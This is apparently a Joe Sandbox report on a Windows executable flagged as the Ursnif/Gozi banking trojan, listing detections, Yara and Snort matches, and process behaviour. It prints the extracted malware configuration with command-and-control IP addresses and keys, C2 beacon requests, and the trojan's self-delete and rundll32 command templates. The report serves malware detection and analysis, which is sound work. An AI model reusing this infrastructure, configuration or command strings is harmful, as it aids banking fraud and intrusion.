Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KOYCdGz80D.exe

Overview

General Information

Sample Name:KOYCdGz80D.exe
Original Sample Name:d09f787a952a6e946656ac9184768fbe.exe
Analysis ID:826246
MD5:d09f787a952a6e946656ac9184768fbe
SHA1:c3c3cbad8d40c7ba332c2b6d7ae0464d092c0877
SHA256:8cd071a056f555c793b95c82f9eff1fcf60e304a1e9589988e9819f27a754256
Tags:2502557713exeGoziISFBUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls

Classification

Process Tree

  • System is w10x64
  • KOYCdGz80D.exe (PID: 5348 cmdline: C:\Users\user\Desktop\KOYCdGz80D.exe MD5: D09F787A952A6E946656AC9184768FBE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
      • 0x1228:$a1: /C ping localhost -n %u && del "%s"
      • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
      • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
      • 0xa9c:$a5: filename="%.4u.%lu"
      • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
      • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
      • 0xe6d:$a9: &whoami=%s
      • 0xe56:$a10: %u.%u_%u_%u_x%u
      • 0xd63:$a11: size=%u&hash=0x%08x
      • 0xb1d:$a12: &uptime=%u
      • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
      • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
      Click to see the 27 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.762.173.142.5149700802033203 03/14/23-15:00:52.733532
      SID:2033203
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.762.173.142.5149700802033204 03/14/23-15:00:52.733532
      SID:2033204
      Source Port:49700
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: KOYCdGz80D.exeVirustotal: Detection: 52%Perma Link
      Source: KOYCdGz80D.exeReversingLabs: Detection: 48%
      Antivirus detection for URL or domain
      Source: http://94.103.183.153/wsAvira URL Cloud: Label: malware
      Source: http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCiAvira URL Cloud: Label: malware
      Source: http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlkAvira URL Cloud: Label: malware
      Source: http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/Avira URL Cloud: Label: malware
      Source: http://94.103.183.153/Avira URL Cloud: Label: malware
      Source: http://62.173.142.51/Avira URL Cloud: Label: malware
      Machine Learning detection for sample
      Source: KOYCdGz80D.exeJoe Sandbox ML: detected
      Source: 0.2.KOYCdGz80D.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

      Compliance

      barindex
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeUnpacked PE file: 0.2.KOYCdGz80D.exe.400000.0.unpack
      Source: KOYCdGz80D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49700 -> 62.173.142.51:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49700 -> 62.173.142.51:80
      Source: global trafficHTTP traffic detected: GET /drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000878000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/
      Source: KOYCdGz80D.exe, 00000000.00000002.509470240.000000000229C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://94.103
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.103.183.153/
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509156874.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCi
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.103.183.153/ws
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/6WkbUYRz/dPSG7YZOtAhk9jZCO3f
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/3PKTGV3tNzaVLTkq/t_2Fk5P4Y6K9Qzr/6RM6HLfcw_2BRzYyd_/2FngDszCZ/8roslt
      Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/3PKTGV3tS
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR
      Source: KOYCdGz80D.exe, 00000000.00000002.509156874.0000000000809000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Writes or reads registry keys via WMI
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Writes registry values via WMI
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: KOYCdGz80D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
